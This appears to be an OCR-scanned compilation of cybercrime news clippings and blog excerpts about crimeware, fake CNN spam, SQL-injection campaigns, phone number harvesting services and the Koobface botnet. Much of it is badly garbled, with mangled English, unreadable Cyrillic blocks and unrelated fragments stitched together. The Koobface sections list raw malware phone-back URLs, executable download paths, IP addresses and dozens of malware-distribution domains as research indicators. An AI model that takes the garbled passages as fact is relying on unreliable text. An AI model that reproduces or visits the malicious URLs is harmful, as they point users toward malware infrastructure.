Wy State to acvetse Meee very Game matics (OF) tots and 
LervCes On ptiicly acceteible forums, Dey re proving Dat hey re ating 
1% Bacriice 3 coman degree of OPSEC (Operational Seawty) tor he 
ane of growing Der Daress model and atractng nee customers” 
Darches repo 


ve neene = 


{EB Sept oer trwntemer cot Tyas no ty a 


MORE Mobte Broty  Wetret 
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OPINION 


Crimeware gets worse - How to 
avoid being robbed by your PC 


0@0600000 


Tho maiware threat to Windows computers continues to get worse, So much — MOBF LIKE — 
80, there's a new term to describe maicious software that transfers money Being alert , 
from online accounts al financial services companies - crimeware. 

| want to like Linux, but it keeps tailing on 
Last week, an article at Technology Review toki about a construction firm that me 


had $447,000 taken out of their bank account by crimeware software on one Cyber attackers empty business accounts 


of their computers. What makes this story particularly interesting is that the i mirnnes 
unnamed bank employed one time passwords. az 

The tate of Apple's Touch ID 
Perhaps you've seen the small key fobs that display a new password every | Tech Talk Ep 1 


minute. If you don't have the key fob, you can't logon. But the computer was 
already infected ard was being used by a legitimate user. Retina scanners 
would not have prevented the crime. 

While the well-verified user was logged on, making legitimate transfers, the 
crimeware sottware generated 27 transfers in the space of a few minutes. 
According the firms president “They not only got into my system here, they 
were able to ascertain how much they coukd draw, so they drew the limit”. 
can't get any worse. 


What to do? 


Dancho Danchey suggests setting “daily, weekly or monthly account 
transaction limits”, assuming your financial institution allows &t. He also 
suggests being notified of transactions via SMS. 
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Fake CNN Alert Still Spreading Malware 


@0000090 


By Gregg Mere 


The massive attack that has tected PCs by trcking users to choking Inks 
in take messages trom CNN.com shows ithe sen of ending soon. secunty 
researchers tay 


According to WK Loge ine. , spare posing as CNN.com Top 10 lets peaked at 
ote 11 milhon messages per hour early Thursday, but remained at hgh 
vores Deoughout the day Friday The Colorado security vendor sad ¢ had 
been backing an average of 8 millon messages per hour ance mudreght. 


WX Loge’s wice president of mlormation securty, Sam Masel , called the 
trend “a very slow, but steady decline” tom the 11 a.m. Mountain Time peak 
the day betore 


| Further padi Pine he mee age of antivir SoMmne ae groment yo OC | 


Maelo aio sad Dat Te span has Changed since attacks were fest 
launched on Tuesday. “We've also seen several morphs of Tvs spam over the 
past couple of days.” he sad in an entry posted on Me WK Loge biog Fretay 
Where the messages once trumpeted * Ch com Dally Top 10° in De 
Subpect Moading and bred to a srgie Mename on maleate hosing Stes row 
the span sports a suiyect reading “CNN Alerts: My Custom Alert and uses a 
vanety of Merames in De maloous URL 


“Thes os baoly 9 response to all of The eda aflerten ard awareness Pat has 
been brow up ower Ihe past couple of Gays.” Masiefc speculated 


Also on Friday, Websense inc reported that ts researchers had seen the 
attach mutating. with the spam subject heading not only touting “CNN Alerts 
Ny Cuntorn Aleet.* but also using legitimate news stones culled trom CNN to 
make the messages more comvimcng 


Users who ciched on the "FULL STORY” irk in the message mere redirected 
to a take CNN 680. where they were told they needed t9 download an update 
to Flash Paryper, Acobe System inc 'S pogetar Internet mecha player. to view a 
video clip from CNN 


Webserse alto sad @ had sgetied aces of the campargs in biog span 


on) 
2 WAC Fate ot Chad and COR eve Meetings 
P Fm tay 09 tag Gain canal Wrenner tener tentang ) rowan wut 


Aoeorees Deut kee Oks tery Se mtO reat ey 


tt unees agreed to download the bogus Flash update. they were rapped in an 
endiess loop, where clicking “Cancer” in the intial dialog produced a second 
popup. Clicking “Cancer” there returned the user to the fest pop-up. The only 
optors af thal port were for users fo shat Gown the browser of ge nm and 
instal he malware 


MX Loge acted fut ¢ had seen he UR.s m De spam lead to legtienate 
domans that had probably been comprormsed. and named a UK based 
renting company at an example 


Earher thea weet. Busnarun seourty seaqarcher Dacha Danchey Mad found 
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The Cybercrime Economy 


NBC hack infects visitors in ‘drive by' 
cyberattack 


by Julianne Pepitone @julpepitone 


(&) Feoruary 23, 3 OSL AMET i Coeo008e 


i SHOWS FULLEMSOOES SCHEDULE ~~ 


CEO'S pay 8 under ire 
arnig opioid epicemnic 


Tonight on NBC Venta scnease- 


THE ONLY BED 
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Sony PlayStation site victim of 
SQL-injection attack 


Automated attack claims another high-profile target, offering 
sale of a fake antivirus scanner. 


ey #OetaT VAMOS: seay 2, 2008 19 468 aw POT ‘ — - es = 


F--Mobiley Buy one, get one FREE. 


to the Sony PinyStation ste may have been prompted to download an 
antivirus scanner Buy one, 


get one 


3 Early Wednesday, antivirus vendor Sophos reported that some visitors 


Pages promoting the PlayStation games SingStar Pop and God of War contained 
SOL-injected code, Visitors to those specific game pages would see 9 take 
omivirus scan, then 4 message that ther comnputer was infected with different 
viruses and Trojan horses, Worned, the user would then be asked to purchase the 
scanner to remove the bogus malware. 


The injected code linking to the scanner has since been removed. 
Sophos said the attack could have downloaded malicious payloads, but dki not 


Security researcher Dancho Danchey said in his ZDNet biog that Sony wasn't 
olone, It was one of 794 domains Nt in the latest automated SOL-injection 
Campaign using 4 mumisyer tost-fiux superstructure bul around coktwop.com. 
Over the last 90 days, Google reports that 794 domains have been infected with 
code pointing to that domain. These are legitimate sites with vulnerabilities that 
allow criminal hackers to inject code pointing to thee servers. 
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CRUSADE-AFFILIATES 


V+0 


The first phone back location urodinam.net /dfgsdfsdf .php - 122.224.9.67 adds a .bat file 
which would attempt to obtain mshta.exe from urodinam.net/33t .php?stime=1253063118 on 
hourly basis. The second phone back location is the Crusade Affiliates network that shares 
revenue with the Koobface gang whenever a scareware pushed by the gang is purchased - 
crusade-affiliates .com/install.php?id=02979 - 85.17.139.149. 


The third phone back location is a _ direct download attempt of [18]Fraud- 
Too!l.Win32.SecretService; RogueAntiSpyware.PrivacyCenter.AJ from Oni901s3feu60 .cn/u4.exe 
- 220.196.59.23. It’s pretty evident that the Koobface botnet is now relying on multiple layers 
of monetization approaches. 


The Koobface gang has been pretty during the last couple of days. The following list of 
Koobface malware spreading domains are in circulation across social networking sites since 
the last 48 hours, consisting of a combination of purely malicious and compromised legitimate 
sites: 

3sss .com/youtube.com 

4bond .it/youtube.com 

ac2j .com/freeemOvies 

aced1979 .freehostia.com/yOurfilm 

alexandrialocksmith .net/uncensOredvideO 

alpha.kei .pl/amalzingfilms 
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Web Gang Operating in the Open 


Dy RIVA RKEIMOND JAN 4 DO 


Five men boleved to be response for spreading a notorious computor 
worm on Facebook and other social networks — and pocketing several 
milion dollars from online schomes — are hiding in plain sight in St. 
Petersburg, Russia, according to investigators at Facebook and several 
indopendent computer secunty researchers. 


The mon live comfortable Eves in St, Potersburg — arxd have frolcked on 
huxury vacations in places like Monte Carlo, Bali and, eartier this morth, 
Turkey, according to photographs posted on social network sites — even 
though thelr idertities have been known for years to Facebook, computor 
security investigators and law enforcement officials. 


One member of the group, which is popularly known as the Koobface gang, 
has regularly broadcast the coordinates of its otfices by checking in on 
Foursquare, a location-based social network, and posting the news to 
Twitter. Photographs on Foursquare also show other suspected members 
of the group working on Macs in a loftlike room that looks Ske offices used 
by toch start-ups in c&es around the world. 


Boginning in July 2008, the Kooblace gang aimed at Web users with 
imitations to watch a funny or sexy video. Those curious enough to click 
the link got a message to update their computer's Flash software, which 
begins the download of the Kooblace malware. Victins’ computers are 
dratioed into a “botnet,” or network of intocted PCs, ard are sent official 
looking advertisements of take antivirus software and their Web searches 
are also hijacked and the clicks delivered to unscrupulous marketers, Tho 
group made money from people who boug the bogus sofware and tom 
unsuspecting advertisers. 


The security software firm Kaspersky Labs has estimated the network 
includes 400,000 to 800,000 PCs workiwide at ts height in 2010. Victins 
are often unaware their machines have been compromised. 
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SC Meda US » Newt » Mane webete hacking tool alerts to cangert of Googie dorks 


by Adam Greenberg Senior Reporter 
LW Foon @wrorgscen } 


November Os, 2013 


Mass website hacking tool alerts to dangers of Google 
dorks 


Google dorks are not geeks who love the internet related services and products provider. Google darks are akin to 
super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable 
websites, 


Cyber crime researcher Dancho Danchev recently blogped about a mass, do-R-yourself (DIY] website tacking tool 
making the rounds that takes advantage of those Google darks. 


“The proxy supporting toot has been purposely designed to allow automatic mass websites reconnaissance for the 
purpose of launching SQL infection attacks against those websites that are vulnerable” Danchev wrote. 


SCA stands for structured query language and is programening terminglogy designed for managing data. SQL 
Injection typkally involves an attacker inputting SQL statements into an entry feld that will force the system to 
execute potentially malicious commands, 


“Once a compromise takes place, the attacker is in a perfect position to inject malicious scripts on the atfected 
sites, potervtially exposing their users to malicious client-side exploits serving attacks,” according to Danchev. 


BDanchey wrote that an escalating number of DIY tools circulating the internet may open the door for novice 
Miackers, but Banry Stiteiman, director of security strategy wah imperva, told SOMagazine.com on Tuesday that & is 
the Google dorks that should be raising alarms, 
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ENTER SOFTWARE SECURITY TRANSFORMATION CEVOPS GUGINESS PERSONAL TECH SCENCE EMEROENTIECN SOOTNOTES Q 


Security @ 
Spammers unleash DIY phone number = 
slurping web tool Frrotox doesn't need to 
aan a be No 1 = and thats OK, 
Well it is Valentine's Day... How else are you going to = ‘Cos it's falling off a ciitl 
get those digits? or ana ishen 
By Jobin Leyden 14 Feb 2013 at 17:03 SHARE ¥ Fa for free in Budapest. He 
fled a bug report. And 
Mobile spammers have released a DTY phone number harvesting tool, Was promptly arrested 
but instead of advertising & solely on criminals-only ontine hangouts, 
i = Adobo will kil Flash by 
ey‘re trying to flog i out in the open. p32 a ceaes nis enite 
Tho availabilty of the utility tums the simple act of submitting a mobile Support, tears, pain. 


framber to a website something that might lead to the receipt of more 


SMS (toxt message) spam. China crams spyware on 


phones in Musiin- 
majortty province 


Amazing new algorithm 
makes hasion power 
slighty less incredibly 
inefficient 


es 
>” 
A new version of the phone number harvesting tool crawis the web and SH 
indexes motile eumbers, phone ID numbers, he names of the owner 

and the associated mobile operator « among other information. Users of 4 ts 

De lool can choose which country Mey want to target ss ts 


The harvested information is later used for various malicious and 
traudvient purposes. 


Key features of the tool include automatic recognition of Russian and 
Ukrainian moble phone providers (based on its initial target market), 
indexing based on a region and city for both Russia and Ukraine, multi- 
roaded software allowing up to 100 “indexing streams”, as wol as an 
option t collect only numbers amached to a partiewar mobée provider 


“Cydeecriminals and spammers are not strangers to the concegt of 
market segmentation.” explained Dancho Danchev, a securtty researcher 
@ Wobroot, in a blog post 


“Just the truc marketers, the Geveloper of the tool has included the 
Option to choose & specific region within the avaiable countries, with he 
idea to assist in the inevitable malicious and frauduient activity that wil 
tosull trom this phone number harvesting activity.” 


Danchev advises surlors to double-check whether any wensite that 
requests your phone number is actually listing it on the web. The phone 
fuember harvesting tool has yet to craw! through sites that require 
authorisation or sproad outside Flussia and the Ukraine, he said, but 
hare versions aro thely to expanding indexing capabilities and 
geographical reach, Danchev wamed. 
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Customizable Mobile Number Harvesting QQ Startsearching now. GO 
Service Found on Underground Market 


bouard Kowacs ePrive 


Security experts have come across a new mobile number harvesting service 
that allows users to fully customize the type of information they want to 
collect. The collected information can then be utilized to drive SMS spam 
Campaigns that rety on specialized services. 


identified by Webroot’s Dancho Danchev in the underground market, the mobile number 
harverting service can be uted to collect information based on region, types of 
CoOenpanies, age, interests, work position, gender and other options. 


According to the service's operators, & takes up to 12 hours to harvest between 1000 and 
35,000 phone numbers, and & takes between 72 and 86 hours if the customer wants over 
50,000 numbers based on certain criteria 


The individuals that advertise the service accept payment via WebMoney, which shows 
that experts might have been right when they said that cybercriminals eraght slowty 
migraie beck to WebMoney mow that Liberty Reserve was out of the picture. 


“We expect to comtinue cbterving an increase in vendors offering cybercriene-as-a-service 
solutions with vertical market integration in mind, in an attempt by the cybercriminals 
Operating them to occupy an even Digger market share within the TDoS and the SMS sparen 
market segments,” Danchev explained 
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Horne Viruses 


Fake CNN Alert Still Spreading Malware 


@©9000000 


By Geogg Ketzor 


mp terword 


The massive attack that has infected PCs by tricking users into clicking links 
in fake messages from CNN.com shows litte sign of ending soon, security 
researchers say 


According to MX Logic Inc. , spam posing as CNN.com Top 10 ists peaked at 
close to 11 milion messages per hour early Thursday, but remained at high 
volumes throughout the day Friday. The Colorado security verxior said it had 
been tracking an average of 6 milion messages per hour since miinight 


MX Logic’s vice president of information security, Sam Masiello , called the 
trend “a very slow, but steady decline” from the 11 a.m. Mountain Time peak 
the day betoro. 


| Further reading: How the mew age of antivirus so®ware wil protect your PC 


Masiello also said that the spam has changed since attacks were first 
launched on Tuesday. “We've also seen several morphs of this spam over the 
past couple of days,” he said in an entry posted on the MX Loge blog Finday 
Where the messages once trumpeted ~ CN .com Daily Top 10° in the 
subject heading and iriked to a single filename on malware-hosting sites, now 
the spam sports a subject reading “CNN Alerts: My Custom Alert” and uses a 
variety of filenames in the malicious URL 
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MORE LIKE THs 


Fake News Guletn Spreads Malware 


Trajan Poses as July 4th Video 


10 Quick Faxes for the Worst Securtty 


Nightmares 


veto 
Why You Lest Your Windows 10 
Product Key 


Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality fake scans that can be used in fraud attacks to impersonate 


victims, Group-IB researchers said 


oOOO000090 


By Lucian Constantin 
Nemana Conmpordert ClO 


A new Web-based service for cybercriminals automates the creation of fake 
scanned documents that can help fraudsters bypass the kientty verification 
processes used by some banks, e-commerce businesses ark other online 
services providers, according to researchers from Russian cybercrime 
irwestigations firm Group-IB 


The service can generate scanned copies of passports, ID cards and driver's 


bicenses from ditierent countries for entities supphed by the service users, fake 


scanned utility bills from various companies, as well as take scanned copies of 
banking statements and credit cards issued by a large number of banks, said 
Andrey Kornarov, head of international projects at Group-|B, via emai. 


lis common practice for banks, payment and money transter providers, onine 
gambling sites and other types of businesses thal engage in money transactons 
via the Intemet to ask their customers for scanned copies of documents in order 


to peove thoi identities or venty their physical addresses, especially when their 
ant-trauxd departments detect suspicious account activity. 


( Related: 4 places to find cybersecurity talent in your own organization J 
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department: 


An image is worth a thousand words: 
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Feed Stats Dashboard Show stats for 
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PRIMARY CHARACTERISTICS 


SIZE: 


REMOTE ACCESS TROJAN Portisr 
Wor*: E-MAIL PROPAGATION 

Wor: IRC PROPAGATION 

KEYSTROKE LOGGER 

FTP SERVER 

PASSWORD GRABBER 

DESTRUCTIVE 

TARGETS SPECIFIC PROGRAMS 

20.6.3 a j STARTS EVERYTIME WINDOWS STARTS 


_ REGISTRY AND FILE ACTIVITY 
[HKEY_LOCAL_MACHII FTW ; 


yord 
assword S 


DESCRIPTION 
Fatal Network Error 


Firehotcker BackDoorz 1.03 
Fore 1.0 


han one file to be listed 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. ~ Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 
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Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
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Competitors 


® Identified Competitors * iDefense Labs (US) 

* Cyber Defense Agency (CDA) WET Intelligent Risk Systems (US) 
(US) * Informatica (US) 

« Cyber Security Research and IT — Information Sharing and 
Development Center (US) Analysis Center (US) 

+ Cyveillance (US) iSIGHT Partners (US) 
Dancho Danchev (EU) * Lookingglass (US) 

« Department of Homeland Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 

* Ernst & Young (EU) * nCircle (US) 

* EWA Information and SecureWorks (US) 
Infrastructure Technologies, Inc. * Trend Micro (US) 
(US) United States Cyber 

+ Fortify (US) Consequence Unit (US) 

« Global Security Mag (EU) 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
Retrieve commands and 
1 KOOBFACE zombie non ra ip 
KOOBFACE C&C ae 4 oe 
ad ye 
a ' 
Retrieve commands from C&C GJ = 
I 
s “ is ss i Koottece porte 
Retrieve subsequent een 
and or 
3 components using zombies” 
———" as proxy 
Affected User Aller ee | an 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware's domain activities. 
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HNNCast052110 


+ Collect This Video Ei Like Share ¥ Flag as objectionable or broken - 1 Views - 1 Collector 
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EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 
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% of % of % of % of 

Blog covered covered timely robust 
I0Cs iocterms 10Cs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

® Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different ae companies and structures to take down our Command-and-Control (C&C) servers, and o 

course analyzing software under VM W 

Trend Micro Tieclten drt geen canes personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool r !) describing all our mistakes ve've ever made; 

Cisco for their 3rd a to our software in their annual “working groups awards"; 

Soren Siebert with his gr 

Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved, And will move. Improving their security system. 


By the way, we did not have s cent using Twitter's traffic, But many security issues tell the world we did. They are wrong. 


As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data, And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it: 


Wish you a good luck in new year and... Merry Christrnas to you! 


Always yours, “Koobface Gang”. 
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[Interacting with Koobface — a Case 
Study] 


« Koobface Gang featured messages and greetings 


* C&C server communication featured messages 
and greetings - "We express our high gratitude to 
Dancho Danchev (http://ddanchev. blogspot.com) 
for the help in bug fixing, researches and 
documentation for our software. 


e Multiple domains registered to typosquatted Dancho 
Danchev 


ti] 
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acking 


up ins ccociation 


Troyan's Web Page HACKED 


More Hackz Of Troyan Pages Coming These Days Because The Passwords Are Let's Say:hacker,troyan,Enkin etc. etc. 


alatle 


Mp2 charts (<3 


Apolications (20 
lavadadie 
much more 


Top 10 Tools Security Directory 


Test your network secunty from a hacker's point of view with GI LANouard N.S.S.' 


Security News Tutorials 


Geeky Photos Links About Astalavista 


I'm Fucking With These Pages Only Because Of Nark@manina’s Wish And As I Said Because Of The Weak Passwords. 


Stemap 


Version 7 now offers anti-virus/anti-sovware checks & hybrid environment support - Download today! 


You're here: Home > Information and Internet Security Portal - Astalavista Security Search 


3 GB FREE 


search list) [ become a member} 
Astalavista. net member 


Inside Astalavista 

Linking to Astalayesta.com 
ve S Subenit it b 
Contact ws, and sha Ought out Ou 
Astalavista FAQ, ree e 
Interview with a core fc 


Astolovista Flash Movie 2005 

Astalavista Scounty News 

Danger: Authenticating e-mail can break & 
Novell in $72m sccurity management bey 
Telecommuting security concerns grow 

Kads outsmart Web filters 

We're winning the war against hackers 

Man fined $US84k in spyware case 

Yahoo accused of helping jad Internet writer 
Mozilla users urged to upgrade 

Microsoft to close security updates on old Windows 
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Latest Directory Entries 
The Evolution Of Spy Tools 
Internet Explorer Virtualizer 


Socal Engenecring: The Biggest Risk to 
Internet Sccunty 


Reversing Ransonware / Cyber 
extortion malicious code - video 


The Price of Restricting Vulncrability 
Publications 

Hodezilla 0.4.18 

LUFT - Layer Four Traccroute (LIT) and 
Whos 

Brief analysis of security scam hijacker 
installation method 


5 Reasons to Choose Sample Sandboxing 
Debugging 101 

Web Appkcation Security Podcast 
Oracle Database Security 

An Economac Analysis of Airport Scourity 
Screening 

Mow to Encrypt BitTorrent Traffic 
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Astalavista Security Group 


04.06.05 


www.astalavista.com 
Google pages indexed: < 100,000 
Backlinks: < 1,000,000 


Started by a hacker/enthusiast in 1997, Astalavista has grown into 
an amazing melting pot of black hats, white hats, and everything in 
between. Whether you're learning how to be digitally naughty or 

<< waxe YOu want to know how to avoid becoming a victim, it’s hard to find a 
better mixture of battlefront news, tips, cracks, and hacks. 
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Stay tuned! 
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18.10.15 Exposing a Compilation of Money Mule Recruitment Related Screenshots - 
An OSINT Analysis (2022-10-26 12:57) 
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Your IP address is 204.124.182.151 x 
City: Clans Summit 

Country: United States 
Continent: North America 
Time Zone: EST more demo? 


Dear blog readers, 


I’ve decided to share with everyone a set of personal screenshots courtesy of the money 
mule recruitment ecosystem throughout the years. 


Sample money mule recruitment screenshots throughout the years include: 


[2] 


Your IP address is 222.35.143.112 Xx) 
City: Beijing 
Country: China 
Continent: Asia 
Time Zone: GMT+8 more demo? 


[3] 
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squashigualada .com/extrimevids 
starcraftdream .com/fuunnyvids 
stm.frihost .org/freeefilm 

stringer .no/uncensOredacti0n 
sttmedia .se/fantastictw 

taia.com .br/uncensOreddwd 
thefurniturewarehouse .net/mmymOvies 
theidusshop .com/publictw 
thepinflow .com/meggashOw 
thorsen-meyer .dk/bestclips 

tivity .dk/amalzingmOvie 

tivity .dk/fantasticfilms 
tizianamaniezzo .com/fantasticclips 
tohva .org/bestactiOn 

troop270 .nwsc.org/fuunnydwd 
txmurphys .com/cOOlfilm 
tybjerglillebakkervand .dk/privalemOvie 
vagnpfisk .dk/privalemOvie 
vivaipirovano .com/youtube.com 
xanchise .com/cOOlclip 

yurafting .com/amalzingvids 


[19]Sampled Koobface binary now phones back to bianca.trinityonline .biz/.sys/?action=Idgen 
&v=14 and bianca.trinityonline .biz/.sys/?action=Idgen &a=590837698 &v=14 &l=1000 &c 
_fb=0 &c ms=0 &c _hi=0 &c tw=0 &c be=0 &c tg=0 &c nl=0. 69.163.147.203 - Email: 
email@darrenjames.net, with the latest Koobfae update modules detected as follows - 
61.235.117.83 /bin/[20]v2prx.exe; 61.235.117.83 /bin/[21]pp.12.exe 


The "Koobface botnet and the 40 cybercriminals" (2008 ali baba and 40 , LLC) have not 
just started monetizing the infected hosts, they’re using multiple layers of monetization to do 
So. 


Related posts: 

[22]Movement on the Koobface Front - Part Two 
[23]Movement on the Koobface Front 

[24]Koobface - Come Out, Come Out, Wherever You Are 
[25]Dissecting Koobface Worm’s Twitter Campaign 
[26]Dissecting the Koobface Worm’s December Campaign 
[27]Dissecting the Latest Koobface Facebook Campaign 
[28]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [29]Dancho Danchev’s blog. 
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3. http: //ddanchev. blogspot . com/2009/07/diverse-portfolio-of-fake-security_27.htm 
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Your IP address is 92.63.111.146 
City: 

Country: Belgium 

Continent: Europe 

Time Zone: GMT+1 more demo? 
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at© Compiég 4 
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[4] 


Your IP address is 64.85.174.143 
City: East Lansing 

Country: United States 
Continent: North America 
Time Zone: EST more demo? 


[5] 
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Your IP address is 85.12.46.2 
City: Eindhoven 

Country: Netherlands 

Continent: Europe 

Time Zone: GMT+1 more demo? 


, gr ier 
‘ a“ . F r) pies ee eit oe: See 
tiles b \c 4 * i Tee J 1 iy age 
i ww ons x \ | 4 , * e j “ J 
hig carum PN se Charleroi “< CaN a * ‘ 10a ___Wetzar 
eS Au ab Uy, we, \ ndrads colli 
[6] 
‘ 195.182.57.34 ——WEL_ge 195.182.57.0/24 ——“S-» As47311 
: 
cnnandpizza.cc 
[7] 


- 74.118.194.82 ——MEL pe 74.118.192.0/22 ——S as4ece4 


Cnet aunarct Sw 


diunar.cc 


[8] 
i 74.118.194.84 ——NEL-g» 74.118.192.0/22 ——“S-p» ass6664 


nsl.bergamoto.com up 


bergamoto.com 


[9] 
4 64.85.174.145 ——MEL- ge 64.85.160.0/20 ——“S-p> as30517 


ns1.worldslava.ce 


worldslava.cc 


[10] 


A 64.85.174.145 ——NEL_p 64.95.160.0/20 ——“S-g» AS30517 


nsl.weathernot.net 
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weathernot.net 


[11] 


P 64.95.174.144 ——MELg 64.95.160.0/20 ——4S-pe 4530517 


nsl.volcanotime.com - 


volcanotime.com 


[12] 


er 64.85.160.0/20 ————4“S-g» 4s30517 
m 64.85.174.143 PTR 


up es bO04s09le.corenetworks.net 
viewdreamercom 
[13] 
A 64.85.174.146 ——HEl_»,. 64.85.160.0/20 —i_y, AS30517 
uleaveit.com 
[14] 


A 64.85.174.146 ——YEL-ge 64.85.160.0/20 ——“S-ge 4S30517 


nsl.sandhouse.cc 


sandhouse.cc 


[15] 


‘. 64.85.174.147 ——NEL-g 64.85.160.0/20 ——“S-ge AS30517 


ns1.pesenlife.net 


pesenlife.net 


[16] 
a 64.85.174.144 ——NEL_y 64.85.160.0/20 ——“2-pe AS30517 
nsl.jockscreamernet a 
jockscreamer.net 
[17] 


__ Ne 64.85.160.0/20 ———_—"S-_ ge 4530517 


A 64.85.174.143 PTR 


a 
ns1.greezly.net i bO04s09le.corenetworks.net 


greezly.net 


[18] 
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A 92.63.111.127 ———NEL-ge 92.63.110.0/23 ——AS-» asz29182 


nsl.translatasheep.net = 


translatasheep.net 


[19] 
— 92.63.110.0/23 ———AS-ye s29182 
A 92.63.110.85 PTR 


a ; 
sae buddhal. ispvds.com 


bizrestroom.cc 


[20] 


AS 
NET 92.63.110.0/23 ———f> + AS29182 


A 92.63.110.85 PTR 


——r 
ns1.benjenkinss.cn - buddhal.ispvds.com 


benjenkinss.cn 
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92.63.111.146 ——NEL-g 92.63.110.0/23 ——“S-m 4529182 


A 
ns1l.alwaysexit.com - 
alwaysexit.com 


[22] 


‘ 89.248.166.45 ——NEL_y 99.248.160.0/21 ——SSpe As29073 


eet ae 


trythisok.cn 


[23] 


A 89.248.166.60 ——“EL-gs 99.248.160.0/21 ——“S-pe s29073 


ns1.partytimee.cn ue 


parytimee.cn 


[24] 
a 89.248.166.45 ——NEL_ge 99.248.160.0/21 ——“S-p» as29073 


nsl,maninwhite.ce “ 


maninwhite.cc 
[25] 
A 89.248.166.59 —il_». 89.248.160.0/21 ——4S-pe As29073 
nsl.chinegrowth.cc ue 
chinegrowth.cc 
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O marayune 
Pomcn 


os) Te 


Pewmercreyer mac © aauen pacxon came! 


fae nonynatencd 


Com tee ORS EHEeremedt WEROREK Hf Ge HE EOTHTE TOMpOCTY TepErTe Gpere He MomcH, TO mee me 
TORETEMOM MYTH. Y MOC fer CMIMETE AETRD 4 MERODOTO MBITH (OTORME Dtwten Ane eteewe 
pawero Gece © CETH Hi re TOMAR. Fede ToRAp, MpOZsRsErEs Ke AEE) NOMAZEE - Yemen, 
fer MORYOETE CUrY KORO of Gre nd 200) ren) Goud, GCE OCMC YEE TORaoE AENEOTCE 
Tepervcaeees axatcrom, @ me Tow noreml. Lenceas nepercKs Ma paANOCecK ReUEE Hare 
DORK UNE, AOR YMENT Rue HH TERCTOROE NOERDE NESE BaweD GeOReCR, COLA Tree Corre, 
RET, MTDOGM Ht einer, BOF ORODS, COMA eE, KDTDRCTES GrpmEree eainced MoSTOT 
OPT, RTL 4 POR BOW OE 


Le Or ements 


EC Bee MRCETE OFT 6 MUHA: Mb Irmee TERCTOR, OXDMTTTOS, NOONAN HTM. 1 DeuaAN rub DTOm 
aapaGorate, TO Ge: Ka Mpamanece mytee! Mer Monomer gam. Bam ZOCTETOeO MpESoCTamrre Me TeCT 
Cow TOOL PAT HF CERDAT OLE C rtRUReT ROCA TerTOM MO AaOECY ~ 

Saree, me "DOBTDe Sau ( COFOEPOCTH 1 TOCME MOREE! Es COmETE DAIWSTS 
Sour TGR mb nawe MOmAdKe, Be Onmere SapebOTaTe FexTDO # FOre, me YrCTWTE mhwe 
PURARSCE DE LAOREN, MISEITE TODTORETS pare CEvhac! 


$200.00 
Yrumareres! hotuen omalos ¢ 
sore tomacTes pabeTe nO FOBECTHONS DECIDES - 
Haeereres Baa! TDThIO 
poche scene ee Ore chope aan Syaer seobascm mas 


Cenghoryes nye) ( erree 

Pewexcn To pesome. fom fam 

PEON OR VENT IED COLON TD 

veterans Cros MoT etpurerecr 

Daborremne, TO Mraue 210r0 Chics 
vahoere. 


TYRS KYRA Me RHO, Bae MePLEN «EE 7 


Cre ROTTS 6 emt eneres 


Gopnar c6opa Rammer 
Meow HAD 


Tpetoesnes « cepseoy: 

ne pabore: tpebyer cepeax nos 
POOLOM, POM, KDR CO DOwes? ¢ 
POE epER ON concOR 
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O maragmnHe Kop3anna 
Ee 180 ee 
teaspoe = * 2 maagcreecet norcR 
Copreponate no: nmeencesess igo%> vim’ ume (pe0 ine) 
seem eo 
ota ORK Lewe 


as —_ B narwe ret rosspes 
ramen Gerpere tatnoies 
2 ipa Acohcaton form ENG) $25.00 
seckaton fom devon = 
Agokcaton form short NG) $20.00 15.09.2009 
pameann, Oe tat citi Conpnean Terenas Goons are OTDEENEress MG (ENG) (ORE) $00 Panace Coperre, Noor pares, 
CorpnecarTerenss Goons ane OTDEB Mere M5 (ENG) (SPLIT) Po) 09.09.2009 
Conponok Terenas Conn Ane OTTOBENEeNs WL (ENG) (OME) $30.00 Mec oremeenee! 
alae Corpoeca Terenas Gone ane OTTDSBAErees WU (ENG) (SPLIT) $25.00 08.07.2009 
Espancl Rohearerve tons 
Formdano de recrpoen EP) (000) $35.00 20.08.2009 
Nomouneece, rotomet Conpoeca Terenas Goons ane OTDEBNEres WU (ESP) (SPLIT) $0.00 ste tats 
= Some ana armceoon ae ane) ESP) EB) $25.00 — 
Coons Ans oTTOMENEMErO Meeks WU ESF) $20.00 op £ 
Oper, nporparres Rekon 
Agokcaton form (TA) $30.00 age 
